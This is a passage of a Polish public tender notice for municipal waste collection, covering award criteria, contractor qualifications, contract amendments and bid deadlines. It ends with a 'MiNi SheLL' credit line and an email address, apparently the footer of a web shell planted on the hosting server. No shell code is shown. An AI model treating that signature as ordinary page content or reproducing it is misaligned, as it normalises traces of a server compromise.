wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/><br/>3. Maksymalna możliwa ocena do uzyskania w tym kryterium wynosi 100 pkt. <br/><br/>4. Zamawiający wybierze spośród ważnych ofert ofertę z najwyższą liczbą punktów.<br/><br/>5. STANDARDY JAKOŚCIOWE ODNOSZĄCE SIĘ DO WSZYSTKICH ISTOTNYCH CECH PRZEDMIOTU ZAMÓWIENIA:<br/>Zamawiający w SWZ określił standardy jakościowe odnoszące się do wszystkich istotnych cech przedmiotu zamówienia, takich jak:<br/>a) Przedmiot zamówienia – Przedmiot zamówienia został określony w Rozdziale IV oraz w Załączniku nr 1 do SWZ – Szczegółowy opis przedmiotu zamówienia<br/>b) Zakres zamówienia – Zakres zamówienia został określony w Rozdziale IV oraz w Załączniku nr 2 do SWZ – Formularz ofertowy<br/>c) Wymagania dotyczące przedmiotu zamówienia – Wymagania zostały określone:<br/>- w Rozdziale VIII oraz IX<br/>- w Projekcie umowy stanowiący załącznik nr 4 do SWZ.<br/><br/>Zasady wyboru oferty i udzielenia zamówienia:<br/><br/>1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie Pzp i niniejszej SWZ oraz uzyska najwyższą liczbę punktów obliczoną według powyższego wzoru. <br/>2.	Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym <br/>w dokumentach zamówienia.<br/>3.	Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, zamawiający wzywa wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>4.	W przypadku braku zgody, o której mowa w ust. 3, zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.<br/>5.	W przypadku wystąpienia sytuacji uniemożliwiającej dokonanie wyboru oferty najkorzystniejszej ze względu na fakt złożenia ofert o jednakowych cenach, Zamawiający wezwie Wykonawców, którzy je złożyli, do złożenia w wyznaczonym terminie ofert dodatkowych. Wykonawcy składając oferty dodatkowe nie będą mogli zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>6.	Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie zamówienia publicznego, Zamawiający może dokonać ponownego badania <br/>i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać ofertę najkorzystniejszą albo unieważnić postępowanie (art. 263 ustawy Pzp.). W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> c)	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>d)	Zdolności technicznej lub zawodowej: <br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże, że wykonał należycie, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie: <br/>1.	Zamawiający uzna warunek ze spełniony jeżeli wykonawca wykaże, ze w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej 1 usługę (usługa realizowana na podstawie jednej umowy na rzecz jednego zamawiającego) odbierania i zagospodarowania odpadów komunalnych w sposób ciągły przez okres nie krótszy niż 12 kolejnych miesięcy. <br/>Wykaz usług – załącznik numer 8<br/>2.	wykaże dysponowanie sprzętem specjalistycznym do odbioru i transportu odpadów tj. co najmniej 1 pojazdem przystosowanym do odbierania zmieszanych odpadów komunalnych oraz co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zbieranych odpadów komunalnych,<br/>Wykaz pojazdów – załącznik numer 9 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, <br/>2)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594, 1237.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ. Oświadczenie składają wszyscy Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia, dotyczy także spółki cywilnej, gdzie oświadczenie składa każdy ze wspólników odrębnie,<br/>3)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia oraz o spełnianiu warunków udziału <br/>w postępowaniu zgodnie z załącznikiem nr 3a do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Uprawnienie do prowadzenia określonej działalności gospodarczej lub zawodowej: <br/>a) aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych od właścicieli nieruchomości, zgodnie z art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2024 r. poz. 399.),<br/>b) aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów zgodnie <br/>z przepisami ustawy z dnia 14.12.2012 r. o odpadach (t.j. Dz. U. z 2023 r. poz. 1587, 1597, 1688, 1852,2029.) <br/>w zakresie odpadów objętych niniejszym postępowaniem.<br/>c) aktualny wpis do Rejestru BDO – z wykazu musi wynikać, że wykonawca może transportować odpady określone w opisie przedmiotu zamówienia, w celu spełnienia warunku wykonawca wskaże adres strony internetowej, na której znajduje się aktywny dla zamawiającego wpis oraz poda numer rejestrowy nadany przez odpowiedni organ.<br/>Zdolność techniczna lub zawodowa: <br/>a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy dostaw lub usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy- zgodnie z załącznikiem nr 8 do SWZ <br/>b) wykaz posiadanych samochodów technicznych- dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Wykaz należy sporządzić wg wzoru stanowiącego załącznik nr 9 do SWZ. Ponadto, wykonawca przed podpisaniem umowy jest zobowiązany do dostarczenia Zamawiającemu kserokopii dowodów rejestracyjnych lub kart pojazdów dla pojazdów wskazanych w przedmiotowym wykazie jako narzędzi przeznaczonych do realizacji przedmiotowego zamówienia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności dokonanej przez podpisanie aneksu za zgodą obu Stron.<br/>2.	Niezależnie od pozostałych przesłanek wskazanych w art. 455 PZP, dopuszcza się dokonanie zmian w treści Umowy na postawie art. 455 ust. 1 pkt 1 PZP (klauzule przeglądowe) tj.:<br/>2.1.	zmiany przepisów prawnych dotyczących Przedmiotu Umowy, jeżeli zmiana przepisów wymaga zmiany postanowień Umowy;<br/>2.2.	zmiany dotyczące terminu realizacji zadania:<br/>a)	zmiany planu finansowego Zamawiającego dotyczącego środków finansowych, przeznaczonych na realizację Umowy;<br/>b)	wstrzymanie przez Zamawiającego realizacji Umowy;<br/>c)	wystąpienia innych zdarzeń obiektywnych niezależnych od Stron Umowy, które zasadniczo utrudniają wykonanie części lub całości zobowiązań wynikających z Umowy, a których Strony, przy dołożeniu należytej staranności, nie mogły przewidzieć, zapobiec im, ani ich przezwyciężyć;<br/>2.3.	jeżeli w związku z przyznaniem środków finansowych na realizację Przedmiotu Umowy albo na skutek zmian warunków ich przyznania, konieczna jest zmiana zapisów Umowy dotyczących w szczególności zasad rozliczeń i warunków płatności za wykonanie Przedmiotu Umowy,<br/>2.4.	jeżeli konieczność zmiany Umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana ta nie modyfikuje ogólnego charakteru Umowy,<br/>2.5.	w razie konieczności zmiany nazwy zadania w trakcie realizacji Przedmiotu Umowy,<br/>2.6.	Zamawiający dopuszcza zmianę postanowień Umowy w zakresie podwykonawstwa wraz <br/>z konsekwencjami z tego wynikającymi, w razie wystąpienia jednej z poniższych okoliczności:<br/>1)	w przypadku konieczności zmiany zakresu podwykonawstwa w stosunku do wskazanego w ofercie lub rezygnacji z wykonywania Przedmiotu Umowy w podwykonawstwie,<br/>2)	w przypadku zmiany lub rezygnacji z podwykonawcy, przy pomocy którego Wykonawca zamierzał wykonać Przedmiot Umowy,<br/>3) w sytuacji, gdy Wykonawca zamierzał wykonać Przedmiot Umowy samodzielnie, jednakże z uwagi na wystąpienie nowych okoliczności po dniu składania ofert, zachodzi konieczność powierzenia wykonania części zamówienia podwykonawcy,<br/>4)	w sytuacji zmiany lub rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 PZP, w celu wykazania spełniania warunków udziału w postępowaniu. Wykonawca zobowiązany jest wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Wykonawca zobowiązany jest wykazać spełnienie warunku udziału w postępowaniu na dzień złożenia wniosku o dokonanie takiej zmiany oraz udokumentować spełnienie tego warunku zgodnie z wymaganiami określonymi w specyfikacji warunków zamówienia,<br/>2.7.	Zamawiający dopuszcza zmianę postanowień Umowy, gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, a także nie zachodzą wobec niego podstawy do wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy.<br/>3.	Z zastrzeżeniem formy przewidzianej w ust. 1, Strony dopuszczają możliwość zmiany treści Umowy w następujących przypadkach:<br/>a)	zmiany w KRS lub wpisie do ewidencji działalności gospodarczej w trakcie realizacji zamówienia, dotyczącej Wykonawcy;<br/>b)	zmiany kont bankowych;<br/>c)	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści Umowy;<br/>d)	zmian regulacji prawnych obowiązujących w dniu zawarcia Umowy lub po jej zawarciu;<br/>4.	Do zmiany danych teleadresowych Stron Umowy, wymagane jest poinformowanie drugiej strony na piśmie. Takie zmiany nie wymagają sporządzenia aneksu do Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-06 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/pcmrzeszow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-06 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com